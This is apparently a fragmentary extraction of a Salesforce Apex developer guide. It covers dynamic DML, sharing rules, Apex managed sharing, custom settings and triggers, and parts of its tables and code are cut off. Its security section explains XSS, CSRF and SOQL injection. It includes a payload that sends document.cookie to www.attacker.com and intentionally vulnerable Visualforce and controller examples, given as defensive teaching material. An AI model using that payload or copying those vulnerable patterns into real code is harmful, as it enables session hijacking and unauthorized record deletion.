SObject s = Database.query('SELECT Id FROM account LIMIT 1')[0].getSObjectType().
newSObject([SELECT Id FROM Account LIMIT 1][0].Id);
167
Dynamic DML
Account a = (Account)DynamicSObjectCreation.createObject(typeName);
System.assertEquals(typeName, String.valueOf(a.getSobjectType()));
// Set the account name and insert the account.
a.Name = acctName;
insert a;
// Verify the new sObject got inserted.
Account[] b = [SELECT Name from Account WHERE Name = :acctName];
system.assert(b.size() > 0);
}
}
The Object scalar data type can be used as a generic data type to set or retrieve field values on an sObject. This is equivalent to the
anyType field type. Note that the Object data type is different from the sObject data type, which can be used as a generic type for any
sObject.
Note: Apex classes and triggers saved (compiled) using API version 15.0 and higher produce a runtime error if you assign a String
value that is too long for the field.
There is no need to specify the external ID for a parent sObject value while working with child sObjects. If you provide an ID in the parent
sObject, it is ignored by the DML operation. Apex assumes the foreign key is populated through a relationship SOQL query, which always
returns a parent object with a populated ID. If you have an ID, use it with the child object.
For example, suppose that custom object C1 has a foreign key c2__c that links to a child custom object C2. You want to create a C1
object and have it associated with a C2 record named 'xxx' (assigned to the value c2__r). You do not need the ID of the 'xxx' record,
as it is populated through the relationship of parent to child. For example:
insert new C1__c(name = 'x', c2__r = new C2__c(name = 'xxx'));
168
If you had assigned a value to the ID for c2__r, it would be ignored. If you do have the ID, assign it to the object (c2__c), not the
record.
You can also access foreign keys using dynamic Apex. The following example shows how to get the values from a subquery in a
parent-to-child relationship using dynamic Apex:
String queryString = 'SELECT Id, Name, ' +
'(SELECT FirstName, LastName FROM Contacts LIMIT 1) FROM Account';
SObject[] queryParentObject = Database.query(queryString);
for (SObject parentRecord : queryParentObject){
Object ParentFieldValue = parentRecord.get('Name');
// Prevent a null relationship from being accessed
SObject[] childRecordsFromParent = parentRecord.getSObjects('Contacts');
if (childRecordsFromParent != null) {
for (SObject childRecord : childRecordsFromParent){
Object ChildFieldValue1 = childRecord.get('FirstName');
Object ChildFieldValue2 = childRecord.get('LastName');
System.debug('Account Name: ' + ParentFieldValue +
'. Contact Name: '+ ChildFieldValue1 + ' ' + ChildFieldValue2);
}
}
}
169
code executes under the same sharing context as the caller. It also contains a class that extends it, which inherits its without sharing
setting.
public with sharing class CWith {
// All code in this class operates with enforced sharing rules.
Account a = [SELECT . . . ];
public static void m() { . . . }
static {
. . .
}
{
. . .
}
public void c() {
. . .
}
}
public without sharing class CWithout {
// All code in this class ignores sharing rules and operates
// as if the context user has the Modify All Data permission.
Account a = [SELECT . . . ];
. . .
public static void m() {
. . .
// This call into CWith operates with enforced sharing rules
// for the context user. When the call finishes, the code execution
// returns to without sharing mode.
CWith.m();
}
170
Warning: There is no guarantee that a class declared as with sharing doesn't call code that operates as without
sharing. Class-level security is always still necessary. In addition, all SOQL or SOSL queries that use PriceBook2 ignore the with
sharing keyword. All PriceBook records are returned, regardless of the applied sharing rules.
Enforcing the current user's sharing rules can impact:
SOQL and SOSL queries. A query may return fewer rows than it would operating in system context.
DML operations. An operation may fail because the current user doesn't have the correct permissions. For example, if the user
specifies a foreign key value that exists in the organization, but which the current user does not have access to.
To check the field-level create permission of the contact's email field before creating a new contact:
if (Schema.sObjectType.Contact.fields.Email.isCreateable()) {
// Create new contact
}
To check the field-level read permission of the contact's email field before querying for this field:
if (Schema.sObjectType.Contact.fields.Email.isAccessible()) {
Contact c = [SELECT Email FROM Contact WHERE Id= :Id];
}
171
Class Security
To check the object-level permission for the contact before deleting the contact.
if (Schema.sObjectType.Contact.isDeletable()) {
// Delete contact
}
Sharing rules are distinct from object-level and field-level permissions. They can coexist. If sharing rules are defined in Salesforce, you
can enforce them at the class level by declaring the class with the with sharing keyword. For more information, see Using the
with sharing or without sharing Keywords. If you call the sObject describe result and field describe result access control
methods, the verification of object and field-level permissions is performed in addition to the sharing rules that are in effect. Sometimes,
the access level granted by a sharing rule could conflict with an object-level or field-level permission.
Class Security
You can specify which users can execute methods in a particular top-level class based on their user profile or permission sets. You can
only set security on Apex classes, not on triggers.
To set Apex class security from the class list page:
1. From Setup, click Develop > Apex Classes.
2. Next to the name of the class that you want to restrict, click Security.
3. Select the profiles that you want to enable from the Available Profiles list and click Add, or select the profiles that you want to disable
from the Enabled Profiles list and click Remove.
4. Click Save.
To set Apex class security from the class detail page:
1. From Setup, click Develop > Apex Classes.
2. Click the name of the class that you want to restrict.
3. Click Security.
4. Select the profiles that you want to enable from the Available Profiles list and click Add, or select the profiles that you want to disable
from the Enabled Profiles list and click Remove.
5. Click Save.
To set Apex class security from a permission set:
1. From Setup, click Manage Users > Permission Sets.
2. Select a permission set.
3. Click Apex Class Access.
4. Click Edit.
5. Select the Apex classes that you want to enable from the Available Apex Classes list and click Add, or select the Apex classes that
you want to disable from the Enabled Apex Classes list and click Remove.
6. Click Save.
To set Apex class security from a profile:
1. From Setup, click Manage Users > Profiles.
2. Select a profile.
3. In the Apex Class Access page or related list, click Edit.
172
4. Select the Apex classes that you want to enable from the Available Apex Classes list and click Add, or select the Apex classes that
you want to disable from the Enabled Apex Classes list and click Remove.
5. Click Save.
Understanding Sharing
Sharing enables record-level access control for all custom objects, as well as many standard objects (such as Account, Contact, Opportunity
and Case). Administrators first set an objects organization-wide default sharing access level, and then grant additional access based on
record ownership, the role hierarchy, sharing rules, and manual sharing. Developers can then use Apex managed sharing to grant
additional access programmatically with Apex. Most sharing for a record is maintained in a related sharing object, similar to an access
control list (ACL) found in other platforms.
Types of Sharing
Salesforce has the following types of sharing:
Force.com Managed Sharing
Force.com managed sharing involves sharing access granted by Force.com based on record ownership, the role hierarchy, and
sharing rules:
Record Ownership
Each record is owned by a user or optionally a queue for custom objects, cases and leads. The record owner is automatically
granted Full Access, allowing them to view, edit, transfer, share, and delete the record.
Role Hierarchy
The role hierarchy enables users above another user in the hierarchy to have the same level of access to records owned by or
shared with users below. Consequently, users above a record owner in the role hierarchy are also implicitly granted Full Access
to the record, though this behavior can be disabled for specific custom objects. The role hierarchy is not maintained with sharing
records. Instead, role hierarchy access is derived at runtime. For more information, see Controlling Access Using Hierarchies in
the Salesforce online help.
Sharing Rules
Sharing rules are used by administrators to automatically grant users within a given group or role access to records owned by a
specific group of users. Sharing rules cannot be added to a package and cannot be used to support sharing logic for apps installed
from Force.com AppExchange.
Sharing rules can be based on record ownership or other criteria. You cant use Apex to create criteria-based sharing rules. Also,
criteria-based sharing cannot be tested using Apex.
All implicit sharing added by Force.com managed sharing cannot be altered directly using the Salesforce user interface, SOAP API,
or Apex.
173
Account Sharing
ImplicitChild
ImplicitParent
Owner
Owner
Opportunity Team
Team
Sharing Rule
Rule
TerritoryRule
Manual Sharing
Manual
Territory Manual
TerritoryManual
174
Defined by developer
Defined by developer
The displayed reason for Apex managed sharing is defined by the developer.
Access Levels
When determining a users access to a record, the most permissive level of access is used. Most share objects support the following
access levels:
Access Level
API Name
Description
Private
None
Only the record owner and users above the record owner in the role hierarchy
can view and edit the record. This access level only applies to the AccountShare
object.
Read Only
Read
Read/Write
Edit
The specified user or group can view and edit the record.
Full Access
All
The specified user or group can view, edit, transfer, share, and delete the record.
Note: This access level can only be granted with Force.com managed
sharing.
Objects on the detail side of a master-detail relationship do not have an associated sharing object. The detail records access is determined
by the masters sharing object and the relationships sharing setting. For more information, see Custom Object Security Overview in
the Salesforce online help.
A share object includes records supporting all three types of sharing: Force.com managed sharing, user managed sharing, and Apex
managed sharing. Sharing granted to users implicitly through organization-wide defaults, the role hierarchy, and permissions such as
the View All and Modify All permissions for the given object, View All Data, and Modify All Data are not tracked with this object.
Every share object has the following properties:
Property Name
Description
objectNameAccessLevel The level of access that the specified user or group has been granted for a share sObject. The name
of the property is AccessLevel appended to the object name. For example, the property name
for LeadShare object is LeadShareAccessLevel. Valid values are:
Edit
175
Property Name
Description
Read
All
Note: The All access level can only be used by Force.com managed sharing.
This field must be set to an access level that is higher than the organizations default access level for
the parent object. For more information, see Access Levels on page 175.
ParentID
RowCause
The reason why the user or group is being granted access. The reason determines the type of sharing,
which controls who can alter the sharing record. This field cannot be updated.
UserOrGroupId
The user or group IDs to which you are granting access. A group can be a public group or a sharing
group associated with a role or territory. This field cannot be updated.
You can share a standard or custom object with users or groups. Apex sharing is not available for Customer Community users. For more
information about the types of users and groups you can share an object with, see User and Group in the Object Reference for Salesforce
and Force.com.
176
177
Important: The objects organization-wide default access level must not be set to the most permissive access level. For custom
objects, this is Public Read/Write. For more information, see Access Levels on page 175.
For example, an Apex sharing reason called Recruiter for an object called Job can be referenced as follows:
Schema.Job__Share.rowCause.Recruiter__c
178
5. Enter a name for the Apex sharing reason. The name is used when referencing the reason in the API and Apex. This name can contain
only underscores and alphanumeric characters, and must be unique in your organization. It must begin with a letter, not include
spaces, not end with an underscore, and not contain two consecutive underscores.
6. Click Save.
Note: Apex sharing reasons and Apex managed sharing recalculation are only available for custom objects.
179
// acceptable.
if(!(err.getStatusCode() == StatusCode.FIELD_FILTER_VALIDATION_EXCEPTION
&&
err.getMessage().contains('AccessLevel'))){
// Throw an error when the error is not related to trivial access
level.
trigger.newMap.get(jobShrs[i].ParentId).
addError(
'Unable to grant sharing access due to following exception: '
+ err.getMessage());
}
}
i++;
}
}
}
Under certain circumstances, inserting a share row results in an update of an existing share row. Consider these examples:
If a manual share access level is set to Read and you insert a new one thats set to Write, the original share rows are updated to Write,
indicating the higher level of access.
If users can access an account because they can access its child records (contact, case, opportunity, and so on), and an account
sharing rule is created, the row cause of the parent implicit share is replaced by the sharing rule row cause, indicating the higher
level of access.
Important: The objects organization-wide default access level must not be set to the most permissive access level. For custom
objects, this is Public Read/Write. For more information, see Access Levels on page 175.
180
To recalculate Apex managed sharing, you must write an Apex class that implements a Salesforce-provided interface to do the recalculation.
You must then associate the class with the custom object, on the custom object's detail page, in the Apex Sharing Recalculation related
list.
Note: Apex sharing reasons and Apex managed sharing recalculation are only available for custom objects.
You can execute this class from the custom object detail page where the Apex sharing reason is specified. An administrator might need
to recalculate the Apex managed sharing for an object if a locking issue prevented Apex code from granting access to a user as defined
by the applications logic. You can also use the Database.executeBatch method to programmatically invoke an Apex managed
sharing recalculation.
Note: Every time a custom object's organization-wide sharing default access level is updated, any Apex recalculation classes
defined for associated custom object are also executed.
To monitor or stop the execution of the Apex recalculation, from Setup, click Monitoring > Apex Jobs or Jobs > Apex Jobs.
181
182
// is acceptable.
if(!(err.getStatusCode() == StatusCode.FIELD_FILTER_VALIDATION_EXCEPTION
&& err.getMessage().contains('AccessLevel'))){
// Error is not related to trivial access level.
// Send an email to the Apex job's submitter.
Messaging.SingleEmailMessage mail = new Messaging.SingleEmailMessage();
String[] toAddresses = new String[] {emailAddress};
mail.setToAddresses(toAddresses);
mail.setSubject('Apex Sharing Recalculation Exception');
mail.setPlainTextBody(
'The Apex sharing recalculation threw the following exception: ' +
err.getMessage());
Messaging.sendEmail(new Messaging.SingleEmailMessage[] { mail });
}
}
}
} catch(DmlException e) {
// Send an email to the Apex job's submitter on failure.
Messaging.SingleEmailMessage mail = new Messaging.SingleEmailMessage();
String[] toAddresses = new String[] {emailAddress};
mail.setToAddresses(toAddresses);
mail.setSubject('Apex Sharing Recalculation Exception');
mail.setPlainTextBody(
'The Apex sharing recalculation threw the following exception: ' +
e.getMessage());
Messaging.sendEmail(new Messaging.SingleEmailMessage[] { mail });
}
}
// The finish method is called at the end of a sharing recalculation.
global void finish(Database.BatchableContext BC){
183
184
185
This script block inserts the value of the user-supplied userparam onto the page. The attacker can then enter the following value for
userparam:
1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo='2
In this case, all of the cookies for the current page are sent to www.attacker.com as the query string in the request to the
cookie.cgi script. At this point, the attacker has the victim's session cookie and can connect to the Web application as if they were
the victim.
The attacker can post a malicious script using a Website or email. Web application users not only see the attacker's input, but their
browser can execute the attacker's script in a trusted context. With this ability, the attacker can perform a wide variety of attacks against
the victim. These range from simple actions, such as opening and closing windows, to more malicious attacks, such as stealing data or
session cookies, allowing an attacker full access to the victim's session.
For more information on this attack in general, see the following articles:
http://www.owasp.org/index.php/Cross_Site_Scripting
http://www.cgisecurity.com/xss-faq.html
http://www.owasp.org/index.php/Testing_for_Cross_site_scripting
http://www.google.com/search?q=cross-site+scripting
Within the Force.com platform there are several anti-XSS defenses in place. For example, Salesforce has implemented filters that screen
out harmful characters in most output methods. For the developer using standard classes and output methods, the threats of XSS flaws
186
have been largely mitigated. However, the creative developer can still find ways to intentionally or accidentally bypass the default
controls. The following sections show where protection does and does not exist.
Existing Protection
All standard Visualforce components, which start with <apex>, have anti-XSS filters in place. For example, the following code is normally
vulnerable to an XSS attack because it takes user-supplied input and outputs it directly back to the user, but the <apex:outputText>
tag is XSS-safe. All characters that appear to be HTML tags are converted to their literal form. For example, the < character is converted
to < so that a literal < displays on the user's screen.
<apex:outputText>
{!$CurrentPage.parameters.userInput}
</apex:outputText>
<apex:includeScript>
The <apex:includeScript> Visualforce component allows you to include a custom script on the page. In these cases, be
very careful to validate that the content is safe and does not include user-supplied data. For example, the following snippet is
extremely vulnerable because it includes user-supplied input as the value of the script text. The value provided by the tag is a URL
to the JavaScript to include. If an attacker can supply arbitrary data to this parameter (as in the example below), they can potentially
direct the victim to include any JavaScript file from any other website.
<apex:includeScript value="{!$CurrentPage.parameters.userInput}" />
187
technology. This can lead to potentially dangerous situations if the formula expression references non-system data (that is potentially
hostile or editable data) and the expression itself is not wrapped in a function to escape the output during rendering.
A common vulnerability is created by rerendering user input on a page. For example,
<apex:page standardController="Account">
<apex:form>
<apex:commandButton rerender="outputIt" value="Update It"/>
<apex:inputText value="{!myTextField}"/>
</apex:form>
<apex:outputPanel id="outputIt">
Value of myTextField is <apex:outputText value=" {!myTextField}" escape="false"/>
</apex:outputPanel>
</apex:page>
The unescaped {!myTextField} results in a cross-site scripting vulnerability. For example, if the user enters :
<script>alert('xss')
and clicks Update It, the JavaScript is executed. In this case, an alert dialog is displayed, but more malicious uses could be designed.
There are several functions that you can use for escaping potentially insecure strings.
HTMLENCODE
The HTMLENCODE function encodes text strings and merge field values for use in HTML by replacing characters that are reserved
in HTML, such as the greater-than sign (>), with HTML entity equivalents, such as >.
JSENCODE
The JSENCODE function encodes text strings and merge field values for use in JavaScript by inserting escape characters, such as a
backslash (\), before unsafe JavaScript characters, such as the apostrophe (').
JSINHTMLENCODE
The JSINHTMLENCODE function encodes text strings and merge field values for use in JavaScript within HTML tags by inserting
escape characters before unsafe JavaScript characters and replacing characters that are reserved in HTML with HTML entity equivalents.
URLENCODE
The URLENCODE function encodes text strings and merge field values for use in URLs by replacing characters that are illegal in URLs,
such as blank spaces, with the code that represent those characters as defined in RFC 3986, Uniform Resource Identifier (URI): Generic
Syntax. For example, exclamation points are replaced with %21.
To use HTMLENCODE to secure the previous example, change the <apex:outputText> to the following:
<apex:outputText value=" {!HTMLENCODE(myTextField)}" escape="false"/>
If a user enters <script>alert('xss') and clicks Update It, the JavaScript is not be executed. Instead, the string is encoded
and the page displays Value of myTextField is <script>alert('xss').
Depending on the placement of the tag and usage of the data, both the characters needing escaping as well as their escaped counterparts
may vary. For instance, this statement:
<script>var ret = "{!$CurrentPage.parameters.retURL}";script>var ret =
"{!$CurrentPage.parameters.retURL}";</script>
requires that the double quote character be escaped with its URL encoded equivalent of %22 instead of the HTML escaped ", since it
is going to be used in a link. Otherwise, the request:
http://example.com/demo/redirect.html?retURL=%22foo%22%3Balert('xss')%3B%2F%2F
188
results in:
<script>var ret = "foo";alert('xss');//";</script>
Formula tags can also be used to include platform object data. Although the data is taken directly from the user's organization, it must
still be escaped before use to prevent users from executing code in the context of other users (potentially those with higher privilege
levels). While these types of attacks must be performed by users within the same organization, they undermine the organization's user
roles and reduce the integrity of auditing records. Additionally, many organizations contain data which has been imported from external
sources and may not have been screened for malicious content.
In other words, the attacker's page contains a URL that performs an action on your website. If the user is still logged into your Web page
when they visit the attacker's Web page, the URL is retrieved and the actions performed. This attack succeeds because the user is still
authenticated to your Web page. This is a very simple example and the attacker can get more creative by using scripts to generate the
callback request or even use CSRF attacks against your AJAX methods.
For more information and traditional defenses, see the following articles:
http://www.owasp.org/index.php/Cross-Site_Request_Forgery
http://www.cgisecurity.com/csrf-faq.html
http://shiflett.org/articles/cross-site-request-forgeries
Within the Force.com platform, Salesforce has implemented an anti-CSRF token to prevent this attack. Every page includes a random
string of characters as a hidden form field. Upon the next page load, the application checks the validity of this string of characters and
does not execute the command unless the value matches the expected value. This feature protects you when using all of the standard
controllers and methods.
Here again, the developer might bypass the built-in defenses without realizing the risk. For example, suppose you have a custom controller
where you take the object ID as an input parameter, then use that input parameter in an SOQL call. Consider the following code snippet.
<apex:page controller="myClass" action="{!init}"</apex:page>
public class myClass {
public void init() {
Id id = ApexPages.currentPage().getParameters().get('id');
Account obj = [select id, Name FROM Account WHERE id = :id];
delete obj;
return ;
}
}
189
In this case, the developer has unknowingly bypassed the anti-CSRF controls by developing their own action method. The id parameter
is read and used in the code. The anti-CSRF token is never read or validated. An attacker Web page might have sent the user to this page
using a CSRF attack and provided any value they wish for the id parameter.
There are no built-in defenses for situations like this and developers should be cautious about writing pages that take action based upon
a user-supplied parameter like the id variable in the preceding example. A possible work-around is to insert an intermediate confirmation
page before taking the action, to make sure the user intended to call the page. Other suggestions include shortening the idle session
timeout for the organization and educating users to log out of their active session and not use their browser to visit other sites while
authenticated.
SOQL Injection
In other programming languages, the previous flaw is known as SQL injection. Apex does not use SQL, but uses its own database query
language, SOQL. SOQL is much simpler and more limited in functionality than SQL. Therefore, the risks are much lower for SOQL injection
than for SQL injection, but the attacks are nearly identical to traditional SQL injection. In summary SQL/SOQL injection involves taking
user-supplied input and using those values in a dynamic SOQL query. If the input is not validated, it can include SOQL commands that
effectively modify the SOQL statement and trick the application into performing unintended commands.
For more information on SQL Injection attacks see:
http://www.owasp.org/index.php/SQL_injection
http://www.owasp.org/index.php/Blind_SQL_Injection
http://www.owasp.org/index.php/Guide_to_SQL_Injection
http://www.google.com/search?q=sql+injection
This is a very simple example but illustrates the logic. The code is intended to search for contacts that have not been deleted. The user
provides one input value called name. The value can be anything provided by the user and it is never validated. The SOQL query is built
190
dynamically and then executed with the Database.query method. If the user provides a legitimate value, the statement executes
as expected:
// User supplied value: name = Bob
// Query string
SELECT Id FROM Contact WHERE (IsDeleted = false and Name like '%Bob%')
Now the results show all contacts, not just the non-deleted ones. A SOQL Injection flaw can be used to modify the intended logic of any
vulnerable query.
If you must use dynamic SOQL, use the escapeSingleQuotes method to sanitize user-supplied input. This method adds the
escape character (\) to all single quotation marks in a string that is passed in from a user. The method ensures that all single quotation
marks are treated as enclosing strings, instead of database commands.
191
Custom Settings
}
}
In this case, all contact records are searched, even if the user currently logged in would not normally have permission to view these
records. The solution is to use the qualifying keywords with sharing when declaring the class:
public with sharing class customController {
. . .
}
The with sharing keyword directs the platform to use the security sharing permissions of the user currently logged in, rather than
granting full access to all records.
Custom Settings
Custom settings are similar to custom objects and enable application developers to create custom sets of data, as well as create and
associate custom data for an organization, profile, or specific user. All custom settings data is exposed in the application cache, which
enables efficient access without the cost of repeated queries to the database. This data can then be used by formula fields, validation
rules, Apex, and the SOAP API.
There are two types of custom settings:
List Custom Settings
A type of custom setting that provides a reusable set of static data that can be accessed across your organization. If you use a particular
set of data frequently within your application, putting that data in a list custom setting streamlines access to it. Data in list settings
does not vary with profile or user, but is available organization-wide. Examples of list data include two-letter state abbreviations,
international dialing prefixes, and catalog numbers for products. Because the data is cached, access is low-cost and efficient: you
don't have to use SOQL queries that count against your governor limits.
Hierarchy Custom Settings
A type of custom setting that uses a built-in hierarchical logic that lets you personalize settings for specific profiles or users. The
hierarchy logic checks the organization, profile, and user settings for the current user and returns the most specific, or lowest, value.
In the hierarchy, settings for an organization are overridden by profile settings, which, in turn, are overridden by user settings.
The following examples illustrate how you can use custom settings:
A shipping application requires users to fill in the country codes for international deliveries. By creating a list setting of all country
codes, users have quick access to this data without needing to query the database.
An application displays a map of account locations, the best route to take, and traffic conditions. This information is useful for sales
reps, but account executives only want to see account locations. By creating a hierarchy setting with custom checkbox fields for
route and traffic, you can enable this data for just the Sales Rep profile.
You can create a custom setting in the Salesforce user interface: from Setup, click Develop > Custom Settings. After creating a custom
setting and youve added fields, provide data to your custom setting by clicking Manage from the detail page. Each data set is identified
by the name you give it.
For example, if you have a custom setting named Foundation_Countries__c with one text field Country_Code__c, your data sets can
look like the following:
Data Set Name
United States
USA
Canada
CAN
192
United Kingdom
Custom Settings
GBR
You can also include a custom setting in a package. The visibility of the custom setting in the package depends on the Visibility
setting.
Note: Only custom settings definitions are included in packages, not data. If you need to include data, you must populate the
custom settings using Apex code run by the subscribing organization after theyve installed the package.
Apex can access both custom setting typeslist and hierarchy.
Note: If Privacy for a custom setting is Protected and the custom setting is contained in a managed package, the subscribing
organization cannot edit the values or access them using Apex.
The following example uses the getValues method to return all the field values associated with the specified data set. This method
can be used with both list and hierarchy custom settings, using different parameters.
CustomSettingName__c mc = CustomSettingName__c.getValues(data_set_name);
The following example uses the getInstance method to return the data set values for the specified profile. The getInstance
method can also be used with a user ID.
CustomSettingName__c mc = CustomSettingName__c.getInstance(Profile_ID);
SEE ALSO:
Custom Settings Methods
193
CHAPTER 8
In this chapter ...
Invoking Apex
This chapter describes in detail the different mechanisms for invoking Apex code.
Here is an overview of the many ways you can invoke Apex. You can run Apex using:
Anonymous Blocks
Triggers
Asynchronous Apex
Web Services
Asynchronous Apex by executing a future method, scheduling an Apex class to run at specified
intervals, or running a batch job.
Visualforce Classes
Apex Web Services, which allow exposing your methods via SOAP and REST Web services.
194
Invoking Apex
Anonymous Blocks
Anonymous Blocks
User Permissions Needed
To execute anonymous Apex:
Author Apex
(Anonymous Apex execution through the API allows restricted access without the Author
Apex permission.)
An anonymous block is Apex code that does not get stored in the metadata, but that can be compiled and executed using one of the
following:
Developer Console
Force.com IDE
The executeAnonymous() SOAP API call:
ExecuteAnonymousResult executeAnonymous(String code)
You can use anonymous blocks to quickly evaluate Apex on the fly, such as in the Developer Console or the Force.com IDE, or to write
code that changes dynamically at runtime. For example, you might write a client Web application that takes input from a user, such as
a name and address, and then uses an anonymous block of Apex to insert a contact with that name and address into the database.
Note the following about the content of an anonymous block (for executeAnonymous(), the code String):
Can include user-defined methods and exceptions.
User-defined methods cannot include the keyword static.
You do not have to manually commit any database changes.
If your Apex trigger completes successfully, any database changes are automatically committed. If your Apex trigger does not
complete successfully, any changes made to the database are rolled back.
Unlike classes and triggers, anonymous blocks execute as the current user and can fail to compile if the code violates the user's
object- and field-level permissions.
Do not have a scope other than local. For example, though it is legal to use the global access modifier, it has no meaning. The
scope of the method is limited to the anonymous block.
When you define a class or interface (a custom type) in an anonymous block, the class or interface is considered virtual by default
when the anonymous block executes. This is true even if your custom type wasnt defined with the virtual modifier. Save your
class or interface in Salesforce to avoid this from happening. Note that classes and interfaces defined in an anonymous block arent
saved in your organization.
Even though a user-defined method can refer to itself or later methods without the need for forward declarations, variables cannot be
referenced before their actual declaration. In the following example, the Integer int must be declared while myProcedure1 does
not:
Integer int1 = 0;
void myProcedure1() {
myProcedure2();
}
void myProcedure2() {
int1++;
195
Invoking Apex
Triggers
}
myProcedure1();
Executing Anonymous Apex through the API and the Author Apex
Permission
To run any Apex code with the executeAnonymous() API call, including Apex methods saved in the organization, users must
have the Author Apex permission. For users who dont have the Author Apex permission, the API allows restricted execution of
anonymous Apex. This exception applies only when users execute anonymous Apex through the API, or through a tool that uses the
API, but not in the Developer Console. Such users are allowed to run the following in an anonymous block.
Code that they write in the anonymous block
Web service methods (methods declared with the webservice keyword) that are saved in the organization
Any built-in Apex methods that are part of the Apex language
Running any other Apex code isnt allowed when the user doesnt have the Author Apex permission. For example, calling methods of
custom Apex classes that are saved in the organization isnt allowed nor is using custom classes as arguments to built-in methods.
When users without the Author Apex permission run DML statements in an anonymous block, triggers can get fired as a result.
Triggers
Apex can be invoked through the use of triggers. A trigger is Apex code that executes before or after the following types of operations:
insert
update
delete
merge
upsert
undelete
For example, you can have a trigger run before an object's records are inserted into the database, after records have been deleted, or
even after a record is restored from the Recycle Bin.
You can define triggers for top-level standard objects that support triggers, such as a Contact or an Account, some standard child objects,
such as a CaseComment, and custom objects.
For case comments, from Setup, click Customize > Cases > Case Comments > Triggers.
For email messages, from Setup, click Customize > Cases > Email Messages > Triggers.
196
Invoking Apex
Bulk Triggers
Implementation Considerations
Before creating triggers, consider the following:
upsert triggers fire both before and after insert or before and after update triggers as appropriate.
merge triggers fire both before and after delete triggers for the losing records and before update triggers for the winning
record only. See Triggers and Merge Statements on page 204.
Triggers that execute after a record has been undeleted only work with specific objects. See Triggers and Recovered Records on
page 205.
Field history is not recorded until the end of a trigger. If you query field history in a trigger, you will not see any history for the current
transaction.
For Apex saved using Salesforce API version 20.0 or earlier, if an API call causes a trigger to fire, the chunk of 200 records to process
is further split into chunks of 100 records. For Apex saved using Salesforce API version 21.0 and later, no further splits of API chunks
occur. Note that static variable values are reset between API batches, but governor limits are not. Do not use static variables to track
state information between API batches.
Bulk Triggers
All triggers are bulk triggers by default, and can process multiple records at a time. You should always plan on processing more than one
record at a time.
Note: An Event object that is defined as recurring is not processed in bulk for insert, delete, or update triggers.
Bulk triggers can handle both single record updates and bulk operations like:
Data import
Force.com Bulk API calls
Mass actions, such as record owner changes and deletes
Recursive Apex methods and triggers that invoke bulk DML statements
197
Invoking Apex
Trigger Syntax
Trigger Syntax
To define a trigger, use the following syntax:
trigger triggerName on ObjectName (trigger_events) {
code_block
}
where trigger_events can be a comma-separated list of one or more of the following events:
before insert
before update
before delete
after insert
after update
after delete
after undelete
Note:
You can only use the webService keyword in a trigger when it is in a method defined as asynchronous; that is, when the
method is defined with the @future keyword.
A trigger invoked by an insert, delete, or update of a recurring event or recurring task results in a runtime error when
the trigger is called in bulk from the Force.com API.
For example, the following code defines a trigger for the before insert and before update events on the Account object:
trigger myAccountTrigger on Account (before insert, before update) {
// Your code here
}
The code block of a trigger cannot contain the static keyword. Triggers can only contain keywords applicable to an inner class. In
addition, you do not have to manually commit any database changes made by a trigger. If your Apex trigger completes successfully,
any database changes are automatically committed. If your Apex trigger does not complete successfully, any changes made to the
database are rolled back.
Usage
isExecuting
Returns true if the current context for the Apex code is a trigger, not a Visualforce page, a Web service,
or an executeanonymous() API call.
isInsert
Returns true if this trigger was fired due to an insert operation, from the Salesforce user interface,
Apex, or the API.
isUpdate
Returns true if this trigger was fired due to an update operation, from the Salesforce user interface,
Apex, or the API.
198
Invoking Apex
Variable
Usage
isDelete
Returns true if this trigger was fired due to a delete operation, from the Salesforce user interface,
Apex, or the API.
isBefore
Returns true if this trigger was fired before any record was saved.
isAfter
Returns true if this trigger was fired after all records were saved.
isUndelete
Returns true if this trigger was fired after a record is recovered from the Recycle Bin (that is, after an
undelete operation from the Salesforce user interface, Apex, or the API.)
new
newMap
old
Note that this sObject list is only available in update and delete triggers.
oldMap
size
The total number of records in a trigger invocation, both old and new.
Note: If any record that fires a trigger includes an invalid field value (for example, a formula that divides by zero), that value is set
to null in the new, newMap, old, and oldMap trigger context variables.
For example, in this simple trigger, Trigger.new is a list of sObjects and can be iterated over in a for loop, or used as a bind
variable in the IN clause of a SOQL query:
Trigger t on Account (after insert) {
for (Account a : Trigger.new) {
// Iterate over each sObject
}
// This single query finds every contact that is associated with any of the
// triggering accounts. Note that although Trigger.new is a collection of
// records, when used as a bind variable in a SOQL query, Apex automatically
// transforms the list of records into a list of corresponding Ids.
Contact[] cons = [SELECT LastName FROM Contact
WHERE AccountId IN :Trigger.new];
}
This trigger uses Boolean context variables like Trigger.isBefore and Trigger.isDelete to define code that only executes
for specific trigger conditions:
trigger myAccountTrigger on Account(before delete, before insert, before update,
after delete, after insert, after update) {
199
Invoking Apex
if (Trigger.isBefore) {
if (Trigger.isDelete) {
// In a before delete trigger, the trigger accesses the records that will be
// deleted with the Trigger.old list.
for (Account a : Trigger.old) {
if (a.name != 'okToDelete') {
a.addError('You can\'t delete this record!');
}
}
} else {
// In before insert or before update triggers, the trigger accesses the new records
// with the Trigger.new list.
for (Account a : Trigger.new) {
if (a.name == 'bad') {
a.name.addError('Bad name');
}
}
if (Trigger.isInsert) {
for (Account a : Trigger.new) {
System.assertEquals('xxx', a.accountNumber);
System.assertEquals('industry', a.industry);
System.assertEquals(100, a.numberofemployees);
System.assertEquals(100.0, a.annualrevenue);
a.accountNumber = 'yyy';
}
// If the trigger is not a before trigger, it must be an after trigger.
} else {
if (Trigger.isInsert) {
List<Contact> contacts = new List<Contact>();
for (Account a : Trigger.new) {
if(a.Name == 'makeContact') {
contacts.add(new Contact (LastName = a.Name,
AccountId = a.Id));
}
}
insert contacts;
}
}
}}}
200
Invoking Apex
The following table lists considerations about certain actions in different trigger events:
Trigger Event
trigger.new
before insert
Allowed.
after insert
before update
Allowed.
after update
before delete
after delete
after undelete
201
Invoking Apex
associated product color, and places the results in a map. Once the map is created, the trigger iterates through the OpportunityLineItems
in Trigger.new and uses the map to assign the appropriate color.
// When a new line item is added to an opportunity, this trigger copies the value of the
// associated product's color to the new record.
trigger oppLineTrigger on OpportunityLineItem (before insert) {
// For every OpportunityLineItem record, add its associated pricebook entry
// to a set so there are no duplicates.
Set<Id> pbeIds = new Set<Id>();
for (OpportunityLineItem oli : Trigger.new)
pbeIds.add(oli.pricebookentryid);
// Query the PricebookEntries for their associated product color and place the results
// in a map.
Map<Id, PricebookEntry> entries = new Map<Id, PricebookEntry>(
